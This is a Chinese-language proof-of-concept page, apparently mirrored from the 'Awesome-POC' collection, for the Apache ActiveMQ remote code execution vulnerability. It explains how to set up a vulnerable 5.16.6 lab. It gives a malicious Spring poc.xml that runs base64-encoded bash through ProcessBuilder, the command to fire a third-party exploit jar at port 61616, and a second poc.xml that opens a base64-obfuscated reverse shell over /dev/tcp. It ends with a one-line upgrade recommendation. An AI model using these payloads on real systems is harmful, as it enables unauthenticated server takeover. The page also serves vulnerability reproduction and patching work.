admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-06 19:38:09 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web服务器漏洞/Apache ActiveMQ远程代码执行.md
Threekiii 3a81e5cf6d 更新漏洞
2023-10-30 09:25:20 +08:00

114 lines
3.2 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Apache ActiveMQ远程代码执行
## 漏洞描述
Apache ActiveMQ 是 Apache 软件基金会研发的一个开源消息中间件,为应用程序提供高效的、可扩展的、稳定的和安全的企业级消息通信。
当未经身份认证的攻击者访问 Apache ActiveMQ 的 61616 端口时,可通过发送恶意数据在远程服务器上执行代码,进而控制 Apache ActiveMQ 服务器。
更新日期2023-10-25
参考链接:
- https://activemq.apache.org/activemq-5016006-release
- https://github.com/Fw-fW-fw/activemq_Throwable
## 漏洞影响
```
Apache ActiveMQ < 5.18.3
```
## 环境搭建
在 ActiveMQ 官方下载 5.16.6 版本安装包链接https://activemq.apache.org/activemq-5016006-release
解压安装包,在目录 ./apache-activemq-5.16.6/bin/linux-x86-64 下以控制台模式启动,方便排查报错信息,注意使用 jdk 11
```
./activemq console
```
![image-20231027181920007](images/image-20231027181920007.png)
访问 8161 端口管理页面:
![image-20231030090050081](images/image-20231030090050081.png)
## 漏洞复现
编写 poc.xml托管在 8080 端口。开启 http 服务:
```
python3 -m http.server 8080
```
![image-20231027181935525](images/image-20231027181935525.png)
执行命令:
```
touch /tmp/success
-------
base64编码dG91Y2ggL3RtcC9zdWNjZXNz
```
poc.xml注意缩进
```
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="
http://www.springframework.org/schema/beans
http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg >
<list>
<value>bash</value>
<value>-c</value>
<value>{echo,dG91Y2ggL3RtcC9zdWNjZXNz}|{base64,-d}|{bash,-i}</value>
</list>
</constructor-arg>
</bean>
</beans>
```
使用 [poc](https://github.com/Fw-fW-fw/activemq_Throwable) 进行复现:
```
java -jar activemq_poc.jar 127.0.0.1 61616 http://127.0.0.1:8080/poc.xml
```
成功执行 `touch /tmp/success`
![image-20231027181843920](images/image-20231027181843920.png)
反弹 shell 的 poc.xml
```
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="
http://www.springframework.org/schema/beans
http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg >
<list>
<value>bash</value>
<value>-c</value>
<value>{echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEyNy4wLjAuMS84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}</value>
</list>
</constructor-arg>
</bean>
</beans>
```
![image-20231030083005877](images/image-20231030083005877.png)
## 修复建议
根据影响版本中的信息排查并升级到安全版本或直接访问参考链接获取官方更新指南。补丁下载链接https://github.com/apache/activemq/tags
Reference in New Issue View Git Blame Copy Permalink